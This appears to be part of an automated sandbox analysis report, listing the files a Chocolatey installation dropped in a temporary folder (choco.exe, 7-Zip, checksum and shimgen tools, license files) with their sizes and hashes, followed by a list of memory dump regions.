d47a44752fd6a983f9ab0e48aa8b12a2b0bc772ea0bb380c64723bb8e0b2ccbb

SHA512
81c22988af2065e94e4420e1b71d1bd2c12406a74f0984c7183a4905d4cc397a71728a9b0dc41ea625bb12e231fb002e3c965f92f60bcc12e5b0be81b26e056a

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\RefreshEnv.cmd

Filesize
4KB

MD5
cc04b34e013e08cc6f4e0c66969c5295

SHA1
a33f1cb08b56828e3b742ee13cf789442dd5c12f

SHA256
8b6b1d8f6bfab3dc9fbee30d6b2f3093ea3eccd5c66e57161dbe1b8f703fa74c

SHA512
b485af21fcbb699d783e64e035595be7a117a1d6af62166c6d50ebd59ed8953141444f17f3bd07a865c9dd11aa7c75d5a4f2bdfb8b739a1668d055779f0d0c10

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\choco.exe

Filesize
143KB

MD5
1bd9360b3a8f5f981a3b445bc1cd22d3

SHA1
b50211b0180060a59eb8d997199052bf6c2311e5

SHA256
a4748bf9b22da77a21e0b3748ccc4a7a042a6c672f1235503611c66442469ffc

SHA512
a70608ef546129a619b52a733d585a474d2c92498a72eec767f09a53198dd33f7d73d5b2a74963892d7a1ca3b25fa806b89129c776f1c6e0b701e5331e81f962

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\choco.exe.ignore

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.dll

Filesize
1.2MB

MD5
a1a9b229e66a8a6a66588f170029a9e7

SHA1
eb4f3e3cd35a55e8f064512802e72b06d5ebc7d9

SHA256
07f88bae90a4c49e200981445d78683c5ef21ef71bb6927fa7cfd59bca431e80

SHA512
c647dba0743a177c4efe01cf321d66669c89fbc5d8f448c33199e6506244da8b69a512c7319c6fe33efd2d43544171b612e7b094ab7e68def7004faa972580fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.dll.manifest

Filesize
513B

MD5
8f89387331c12b55eaa26e5188d9e2ff

SHA1
537fdd4f1018ce8d08a3d151ad07b55d96e94dd2

SHA256
6b7368ce5e38f6e0ee03ca0a9d1a2322cc0afc07e8de9dcc94e156853eae5033

SHA512
04c10ae52f85d3a27d4b05b3d1427ddc2afaccfe94ed228f8f6ae4447fd2465d102f2dd95caf1b617f8c76cb4243716469d1da3dac3292854acd4a63ce0fd239

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.exe

Filesize
339KB

MD5
96b85d45cfe551f87e5f141ee18bf82e

SHA1
3b21a8ec46a782bf407174fe6f328ec4649fb779

SHA256
8b9f09e2bcaac9166a0f87525864f29c868f2cb8b779ca6d3d63b93b388d5c89

SHA512
24e9de5502929d9104411e7f465327998a8b997de46670db6a8f009755576b93d93e90f6bc08fd7406c9e37859e24b54227dac610ddddde152073aca0e5924ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7zip.license.txt

Filesize
3KB

MD5
f4995e1bc415b0d91044673cd10a0379

SHA1
f2eec05948e9cf7d1b00515a69c6f63bf69e9cca

SHA256
f037e7689f86a12a3f5f836dc73004547c089e4a2017687e5e0b803a19e3888b

SHA512
e7bb1bacab6925978416e3da2acb32543b16b4f0f2289cc896194598ee9ade5c62aa746c51cf6bf4568e77e96c0a1014e4ddb968f18f95178ee8dfb1e5a72b96

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.exe

Filesize
38KB

MD5
d064de30ba9cced9f31bea6f2b11c06c

SHA1
4473898bc847590624f929f282376b87ebeaf53b

SHA256
6674288a105adcfbe0413689a690d4fd917f926f49c0b7b00b94b7b7eb2badb3

SHA512
8bd442a25f2dde4e79aaa525896a715ed556cbe68bdb3faeaecbbd5a7977b6dbe5416f1bdc8124551760176786323b4a28c8b40ce7448146c23ca097ab9f2c73

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.exe.config

Filesize
150B

MD5
e9ad5dd7b32c44f8a241de0e883d7733

SHA1
034c69b120c514ad9ed83c7bad32624560e4b464

SHA256
9b250c32cbec90d2a61cb90055ac825d7a5f9a5923209cfd0625fca09a908d0a

SHA512
bf5a6c477dc5dfeb85ca82d2aed72bd72ed990bedcaf477af0e8cad9cdf3cfbebddc19fa69a054a65bc1ae55aaf8819abcd9624a18a03310a20c80c116c99cc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.license.txt

Filesize
95B

MD5
a10b78183254da1214dd51a5ace74bc0

SHA1
5c9206f667d319e54de8c9743a211d0e202f5311

SHA256
29472b6be2f4e7134f09cc2fadf088cb87089853b383ca4af29c19cc8dfc1a62

SHA512
cae9f800da290386de37bb779909561b4ea4cc5042809e85236d029d9125b3a30f6981bc6b3c80b998f727c48eb322a8ad7f3b5fb36ea3f8c8dd717d4e8be55e

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\shimgen.exe

Filesize
555KB

MD5
ee77f1a8c714642a9e52fe245667774f

SHA1
49535947065360b7fd6dae1bcf37409a01018fcb

SHA256
858669c2958b61e95fac3c82959f1888e769b21a93604ea9b14b7d73c2a16fc8

SHA512
9067ccb78bdc25e344a09e2f201430f9a761b748b610046528af8655935ca831009cfc4dc6b28376075a401e45bfe41742ac0e673ee0fd75cc3c5784420892a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\shimgen.license.txt

Filesize
3KB

MD5
89ac7c94d1013f7b3e32215a3db41731

SHA1
1511376e8a74a28d15bb62a75713754e650c8a8d

SHA256
d4d2ef2c520ec3e4ecff52c867ebd28e357900e0328bb4173cb46996ded353f4

SHA512
9ba2b0029e84de81ffef19b4b17a6d29ee652049bb3152372f504a06121a944ac1a2b1b57c6b0447979d5de9a931186fef9bd0667d5358d3c9cb29b817533792

Download Submit
memory/3892-28-0x000002A2E6E10000-0x000002A2E6E22000-memory.dmp

Filesize
72KB

Download
memory/3892-29-0x000002A2E6E00000-0x000002A2E6E0A000-memory.dmp

Filesize
40KB

Download
memory/3892-202-0x000002A2E6EB0000-0x000002A2E6EBC000-memory.dmp

Filesize
48KB

Download
memory/4168-434-0x00000222318F0000-0x0000022232402000-memory.dmp

Filesize
11.1MB

Download
memory/4168-485-0x000002224EA60000-0x000002224EA7E000-memory.dmp

Filesize
120KB

Download
memory/4168-484-0x000002224EAC0000-0x000002224EB36000-memory.dmp

Filesize
472KB

Download
memory/4168-447-0x000002224C8F0000-0x000002224C940000-memory.dmp

Filesize
320KB

Download
memory/4528-1-0x00000242585E0000-0x0000024258602000-memory.dmp

Filesize
136KB

Download
memory/4528-12-0x00007FFBC4900000-0x00007FFBC53C1000-memory.dmp

Filesize
10.8MB

Download
memory/4528-15-0x00007FFBC4900000-0x00007FFBC53C1000-memory.dmp

Filesize
10.8MB

Download
memory/4528-11-0x00007FFBC4900000-0x00007FFBC53C1000-memory.dmp

Filesize
10.8MB

Download
memory/4528-0-0x00007FFBC4903000-0x00007FFBC4905000-memory.dmp

Filesize
8KB

Download